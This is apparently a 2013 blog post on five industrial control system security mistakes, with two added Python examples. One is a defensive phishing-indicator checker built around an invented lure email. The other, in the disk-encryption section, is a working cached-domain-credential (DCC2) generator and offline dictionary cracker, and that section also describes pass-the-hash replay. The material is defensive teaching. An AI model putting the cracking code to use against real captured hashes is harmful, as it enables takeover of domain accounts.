5 industrial control system cyber security mistakes

From spear phishing to encryption errors, there are many ways to let bad guys into your networks.

04/15/2013


Recently, I attended ICS Cyber Security (301) Training at the U.S. DHS ICS-CERT facility in Idaho Falls, Idaho. The five-day event featured hands-on training in discovering who and what is on the network, identifying vulnerabilities, learning how those vulnerabilities may be exploited, and learning defensive and mitigation strategies for ICSs (industrial control systems). Here are five key takeaways from that training.

1. Spear phishing attacks

Do you know how most computer networks are compromised? By employees who can’t resist an email with the subject line: “Click here to get free gas for a year.” Literally, that is the subject line. This is called phishing, and it is the most prevalent way an attacker gets through a company’s initial network defenses. Phishing emails go to large volumes of addressees and use a generic lure, such as free gas or a security alert from a bank. Spear phishing is directed at a particular company or a smaller group of individuals and uses a lure tailored to them: a supplier’s name, a current plant project, a colleague’s writing style. Either way, the email carries a malicious attachment or link that plants a small program on the victim’s computer. Most people would call it a virus or malware, but it behaves differently: rather than spreading or doing visible damage, it quietly opens a connection back out of the network so the attacker can operate the victim’s computer from outside. From that foothold, easy, generally available tools can map the network, find further weaknesses that allow access deeper into it, and ultimately reach the industrial control system.
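The tell-tale signs of such a lure can be checked mechanically before anyone clicks. The following is an added example, not code from the original post or from ICS-CERT: it parses a constructed “free gas” message (the addresses, domains and attachment name are made up) and reports the three indicators a mail gateway or help desk should look for first: a Reply-To or Return-Path that does not belong to the visible sender, a link whose visible text names one site while its target is another, and an attachment that will execute when opened.

```python
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attachment extensions that execute or run macros when opened on Windows.
DANGEROUS_EXT = (".exe", ".scr", ".pif", ".js", ".vbs", ".hta", ".bat",
                 ".cmd", ".lnk", ".jar", ".docm", ".xlsm")

# Visible anchor text that names a site, e.g. "https://acme.example/rewards".
LOOKS_LIKE_URL = re.compile(r"(?:https?://)?[\w-]+(?:\.[\w-]+)+", re.I)


def _host(value: str) -> str:
    """Host part of an email address or URL, lower-cased."""
    value = value.strip().strip("<>")
    if "@" in value and "://" not in value:
        return value.rsplit("@", 1)[1].lower()
    if "://" not in value:
        value = "http://" + value
    return (urlparse(value).hostname or "").lower()


def _base_domain(host: str) -> str:
    """Registrable-domain approximation: the last two labels."""
    return ".".join(host.split(".")[-2:])


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def phishing_indicators(raw_message: str) -> list:
    """Return (indicator, detail) pairs for one RFC 822 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    sender = parseaddr(str(msg.get("From", "")))[1]
    sender_base = _base_domain(_host(sender))

    # 1. Replies or bounces routed somewhere other than the visible sender.
    for hdr in ("Reply-To", "Return-Path"):
        value = msg.get(hdr)
        if value:
            other = parseaddr(str(value))[1]
            if _base_domain(_host(other)) != sender_base:
                findings.append((hdr.lower() + "-mismatch", f"{other} vs From {sender}"))

    for part in msg.walk():
        # 2. Link text that names one site while the href goes to another.
        if part.get_content_type() == "text/html":
            collector = _AnchorCollector()
            collector.feed(part.get_content())
            for href, text in collector.links:
                if LOOKS_LIKE_URL.match(text) and \
                        _base_domain(_host(text)) != _base_domain(_host(href)):
                    findings.append(("link-mismatch", f"text {text} -> href {href}"))
        # 3. Attachments that execute when opened.
        filename = part.get_filename()
        if filename and filename.lower().endswith(DANGEROUS_EXT):
            findings.append(("dangerous-attachment", filename))
    return findings


# Constructed sample message (not a real capture): all names are invented.
SAMPLE_EMAIL = """\
From: "Acme Fuel Rewards" <rewards@acmefuel.example>
Reply-To: claims@acmefuel-rewards.example
Return-Path: <bounce@mailer-9182.example>
To: operator@plant.example
Subject: Click here to get free gas for a year
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/html

<html><body><p>Claim your reward at
<a href="http://acmefuel.example.claims-portal.example/free">https://acmefuel.example/rewards</a></p>
</body></html>
--B1
Content-Type: application/octet-stream; name="voucher.pdf.exe"
Content-Disposition: attachment; filename="voucher.pdf.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AAA==
--B1--
"""

# Constructed benign message for comparison.
CLEAN_EMAIL = """\
From: "Plant Scheduling" <scheduling@plant.example>
Reply-To: scheduling@plant.example
To: operator@plant.example
Subject: Tuesday shift rota
Content-Type: text/plain

The rota is on the intranet page, see http://intranet.plant.example/rota
"""

if __name__ == "__main__":
    for kind, detail in phishing_indicators(SAMPLE_EMAIL):
        print(f"{kind}: {detail}")
    print("clean message findings:", phishing_indicators(CLEAN_EMAIL))
```

The base-domain check is a deliberate approximation (it treats anything under the last two labels as one owner); for a real gateway you would use the public suffix list, and you would add lookalike-domain comparison against your own company names, which this sample omits.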

2. Wi-Fi weaknesses

You may be enjoying the convenience of using Wi-Fi on your control network. However, if your wireless networking equipment was installed before 2006, it is likely other people can also enjoy using it to get access to your equipment. The original Wi-Fi encryption, WEP, has been broken since 2001 and can be cracked in minutes with freely available tools, and its stopgap successor WPA (with TKIP) is deprecated as well. The only safe way to go wireless is with WPA2 encryption (IEEE 802.11i, which the Wi-Fi Alliance has required for certification since 2006). It is standard on all new COTS (commercial off the shelf) equipment and is considered safe, at least for now, with two caveats. WPA2 with a pre-shared key is only as strong as the passphrase, because an attacker who captures the four-way handshake can guess passphrases offline, so use a long random passphrase or, better, WPA2-Enterprise with 802.1X and per-user credentials; and turn off Wi-Fi Protected Setup (WPS), whose eight-digit PIN can be brute-forced. Better still, treat any wireless segment as untrusted and put a firewall between it and the controllers.

3. Hard drive encryption

If you have a strong laptop password but choose not to encrypt your hard drive, then if your laptop is stolen the thief can gain access to your company’s network. The password only protects a running Windows session; a thief who boots the laptop from a USB stick, or pulls the drive, can read every file on it. That includes the registry hives (SAM, SECURITY and SYSTEM) where Windows keeps the secrets behind roaming connectivity, the feature that lets you move from office to office while staying connected to your network: the NT password hashes of local accounts, the cached domain logon verifiers stored so you can still log in away from the office, and the computer account’s own password in the LSA secrets. This is the “token” or “hash” that says “Hey, this is a trusted company laptop with a correct password,” and the thief does not need to understand it. A local NT hash can be replayed as-is to any machine that shares that account (pass-the-hash), and cached domain credentials can be cracked offline at leisure; either way the attacker’s laptop can then present itself to your network as your trusted company laptop. Full-disk encryption such as BitLocker is the practical way to prevent this, because without the key the hives are unreadable; pair it with a TPM plus a PIN so the key is not released to anyone who merely powers the machine on. The process is actually fairly simple, so ask your network administrator to turn it on if you travel a lot with your laptop.
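To make concrete why a hash sitting on an unencrypted disk is enough, here is an added example (not code from the original post, and not a Microsoft or ICS-CERT tool) that builds the cached domain credential format Windows Vista and later store in the SECURITY hive (DCC2, also called MS-Cache v2: PBKDF2-HMAC-SHA1 over MD4(NT hash || lowercase username), salted with the username, 10240 iterations) and then runs the offline dictionary attack a thief would run against it. MD4 is implemented inline because NT hashes are MD4 and current hashlib builds often no longer expose it. The username, password and wordlist are constructed for the example; the $DCC2$ line format is the one hashcat mode 2100 accepts.

```python
import hashlib
import hmac
import struct
from typing import Optional

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (three rounds of 16 steps over 512-bit blocks)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for offset in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[offset:offset + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                t = (a + func(b, c, d) + words[k] + const) & _MASK
                # Rotate the working variables so each step updates "a".
                a, b, c, d = d, _rotl(t, shifts[i % 4]), b, c
        state = [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """Windows NT hash: unsalted MD4 of the UTF-16LE password, as stored in the SAM."""
    return md4(password.encode("utf-16-le"))


def dcc2(password: str, username: str, iterations: int = 10240) -> bytes:
    """Cached domain credential v2 as stored in the SECURITY hive (Vista and later)."""
    user = username.lower().encode("utf-16-le")
    dcc1 = md4(nt_hash(password) + user)          # the pre-Vista DCC1 value
    return hashlib.pbkdf2_hmac("sha1", dcc1, user, iterations, 16)


def hashcat_line(username: str, digest: bytes, iterations: int = 10240) -> str:
    """Line format hashcat mode 2100 accepts for cracking these verifiers."""
    return f"$DCC2${iterations}#{username.lower()}#{digest.hex()}"


def crack_dcc2(target: bytes, username: str, wordlist) -> Optional[str]:
    """Offline dictionary attack: no network, no lockout, one PBKDF2 per guess."""
    for candidate in wordlist:
        if hmac.compare_digest(dcc2(candidate, username), target):
            return candidate
    return None


# Constructed scenario (not real data): the verifier a thief would lift from the
# SECURITY hive of an unencrypted laptop whose user last logged on as "plantops".
STOLEN_USER = "plantops"
STOLEN_DCC2 = dcc2("Winter2013!", STOLEN_USER)
# Tiny constructed wordlist; real attacks use season-plus-year patterns and leaked lists.
WORDLIST = ["password", "Password1", "Summer2012", "plantops", "Winter2013", "Winter2013!"]

if __name__ == "__main__":
    print(hashcat_line(STOLEN_USER, STOLEN_DCC2))
    print("recovered password:", crack_dcc2(STOLEN_DCC2, STOLEN_USER, WORDLIST))
```

The 10240 PBKDF2 iterations slow each guess, but a GPU cracker still tries hundreds of thousands of candidates per second, so a guessable domain password gives the attacker a valid domain logon. The local account hashes in the SAM need no cracking at all, which is why disk encryption, not password length, is the control that matters here.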

4. Remote access

Since many PLCs and other industrial controllers now have embedded web servers, many people like to log in from home to keep up with what’s happening at the plant. However, they don’t realize that a few extra steps are needed to make sure an attacker can’t also enjoy that convenience. Embedded web interfaces in PLCs assume they are for internal use only, so they have little or no security: default or no passwords, plain HTTP, no lockout after failed logins and no logging. Did you know that there are services that continuously scan the Internet for PLCs? Check out shodanhq.com (now shodan.io) to see whether your PLC has been found yet; it indexes the banners of anything that answers on the common web and industrial protocol ports. Do you want a bored 15-year-old to shut off your cooling tower, or something more important? Don’t be tempted to add external access to your control network without proper layered security (a VPN with strong authentication that terminates in a DMZ, a firewall that lets only the jump host reach the controllers, and no port forwarding straight to the PLC), or you might be the next Internet hacking headline.

5. Software patching

There is no clear answer to the “to patch or not to patch” question. Many software companies recommend, or explicitly state, that systems should receive software updates and patches so that known vulnerabilities cannot be exploited. But what if a patch causes your HMI (human machine interface) to crash? Which is worse, a possible exploit or an unplanned outage caused by a failed software update? To the technician who expects to be the person blamed when the system crashes because of the patch, the answer is clear. So what is a technician to do? The starting point is to know what vulnerabilities exist in your system: keep an inventory of each HMI’s operating system, installed software versions and open network services, and check it against vendor bulletins and ICS-CERT advisories. Then weigh each patch by what it fixes against what it risks. Patches the HMI vendor has qualified can be rolled out during a planned outage after a trial on a spare or test machine. Where a patch cannot be applied at all, such as on an HMI still running Windows 2000, some extra care and protection are required, for example an extra firewall that restricts which hosts can reach it, or application whitelisting so only the HMI software can run. You might find that less attention is needed for new Windows 7 HMI computers when they are regularly updated by IT.

Security takes time and effort, and properly prioritizing your response gives you the best protection for the lowest cost. For more, visit the ICS-CERT overview of cyber vulnerabilities.

This post was written by Bruce Billedeaux, PE. Bruce is a senior consultant at MAVERICK Technologies, a leading system integrator providing industrial automation, operational support, and control systems engineering services in the manufacturing and process industries. MAVERICK delivers expertise and consulting in a wide variety of areas including industrial automation controls, distributed control systems, manufacturing execution systems, operational strategy, and business process optimization. The company provides a full range of automation and controls services – ranging from PID controller tuning and HMI programming to serving as a main automation contractor. Additionally MAVERICK offers industrial and technical staffing services, placing on-site automation, instrumentation and controls engineers.


